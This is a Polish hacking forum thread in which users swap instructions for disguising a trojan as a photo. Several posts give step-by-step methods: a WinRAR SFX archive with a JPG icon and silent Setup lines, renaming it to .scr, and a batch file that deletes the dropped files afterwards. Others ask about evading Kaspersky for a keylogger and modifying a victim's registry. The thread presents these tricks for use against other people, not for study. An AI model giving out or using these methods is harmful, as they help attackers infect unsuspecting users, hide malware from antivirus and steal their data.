+ Odpowiedz na ten temat
Strona 1 z 3 1 2 3 OstatniOstatni
Pokaż wyniki od 1 do 15 z 36

Temat: scr + jpg

Użytkownik

Domyślnie scr + jpg

siemano. jakby co korzystalem z opcji szukaj. wiec czy da sie tak zbindowac jpg + scr zeby oba te pliki sie odpalaly ale roszerzenie byloby scr?

Użytkownik (R)

Domyślnie

każdy binder na to pozwala

Użytkownik

Domyślnie

Ja polecam TEGO bindera, dlatego że jestem jego autorem ( ), ma małą wykrywalność i funkcjonuje jak ma

Użytkownik

Domyślnie

A ja polecam to:

1. Zapakuj Rarem do archiwum SFX pliki "trojan.exe" i "fotka.jpg" oraz daj ikonkę pliku .jpg
    2. Ustaw automatyczną instalacje obu plików (Setup=trojan.exe Setup=fotka.jpg)
    3. Podstanie ci plik "archiwum.exe"
    4. W cmd (Start->Uruchom->cmd) wpisz: "COPY archiwum.exe archiwum.scr"

Jak dla mnie to bardzo dobry sposób ;P

Powstanie plik archiwum.scr (oczywiście nazwę można zmienić) który będzie miał ikonę normalnego zdjęcia, po odpaleniu pokarze zdjęcie i niepostrzeżenie zainstaluje trojana

Użytkownik

Domyślnie

a macie jakis binder ktorego po znidnowaniu keylgera nie wygryje mi Kaspersky ;/ macie taki binder?

a i czy to prawda ze :

"nie konicznie musi mieć rozszerzenie .exe wystarczy że zbindujemy plik .exe z plikiem .jpg oraz plikem .bat i nadamy końcówke np .jppg"[/b]
    wyczytalem to na jakims innym forum... i chcialbym sie dowiedziec czy to prawda ?:>

Użytkownik

Domyślnie

Zgadza się ale nie jest to takie proste gdysz trzeba wcześniej na komputerze ofiary dodać kilka elementów do rejestru. A jak to zrobić było już wiele razy poruszane.

Użytkownik

Domyślnie

Originally posted by lisek160
    A ja polecam to:

1. Zapakuj Rarem do archiwum SFX pliki "trojan.exe" i "fotka.jpg" oraz daj ikonkę pliku .jpg
    3. Podstanie ci plik "archiwum.exe"
    4. W cmd (Start->Uruchom->cmd) wpisz: "COPY archiwum.exe archiwum.scr"

Jak dla mnie to bardzo dobry sposób ;P

Powstanie plik archiwum.scr (oczywiście nazwę można zmienić) który będzie miał ikonę normalnego zdjęcia, po odpaleniu pokarze zdjęcie i niepostrzeżenie zainstaluje trojana
    Odnośnie Punktu 4 Nie Wiem Co Wpisać Wpisywałem Co Tam Pisze Oczywiście Zmieniałem Nazwę Na Swoja archiwum.exe Ale Nie Chce Mi Tego Zrobić Możesz Pomóc Wydaje Mi Sie Ze To Dobry Sposób Ale Nie Mogę Tego Zrobić Pozdro Bortex GG:1453309

Użytkownik

Domyślnie

Nie pisz mu na GG tylko napisz w tym temacie
    Ja też chce wiedzieć

Użytkownik

Domyślnie

wpiszcie w konsoli "COPY ścieszkadopliku/plik.exe szcieżkadozapisaniapliku/plik.scr

np dajecie plik archiwum.exe na dysk C: i w konsoli wpiszcie "COPY C:/archiwum.exe C:/archiwum.scr

Użytkownik

Domyślnie

Witam a ja mam inne pytanko , dzis zacząlem dopiero czytac se te forum i tak w ogole , wiec prosze nie atakowac mnie odrazu .A mianowicie chodzi mi o to ze spakowalem oba te pliki winrarem i podmienilem ikonki tak ze wyglada jakby to byl zwykly jpg po otworzeniu(klikajac 2 razy otwiera sie okno "samorozpakuwujace sie okno archiwum " po czym jak nacisne instaluj to all jest ok - otwiera mi sie zdjecie i to widac oraz moj maly trojanik . Problem jest jednak w tym ze chcialbym by od razu po nacisnieciu na ten plik , rozpakowal sie w tym miejscu a nie wyskakiwalo to okienko od samorozpakowywania ... ,ktos wie jak to zrobic ?Z góry thx

Użytkownik

Domyślnie

Originally posted by lisek160
    Wpisz to

Kod:
    Silent=1;

Setup=trojan.exe;

Setup=zdjęcie.jpg;

Użytkownik

Domyślnie

oki thx zobacze te setupy juz mialem inaczej by sie nie otworzyly ;D- po 5 min juz sprawdzilem all dziala thx wielkie ;D brakowalo mi tylko tej komendy silent=1;

KangurX
    Guest

Domyślnie

działa tylko ze jak wlaczam plik *.scr to sie mi rozpakowuja te pliki ;/

Użytkownik

Domyślnie

to dodaj tam batch'a
    np. takiego
    Kod:
    echo off

del fotka.jpg // usuwa fotke

del plik.bat // usuwa samego siebie

del trojan.exe // usuwa trojana
    no i wtedy takie komentarze
    Kod:
    Silent=1;

Setup=fota.jpg;

Setup=trojan.exe;

Setup=plik.bat;
    ja zrobiłem trojana który usuwał sam siebie i fotkę więc nie potrzebny był ten batch.

KangurX
    Guest

Domyślnie

dalej to samo ;/ jak ustawic w sfx ustawic usuwanie pliku?

+ Odpowiedz na ten temat

Uprawnienia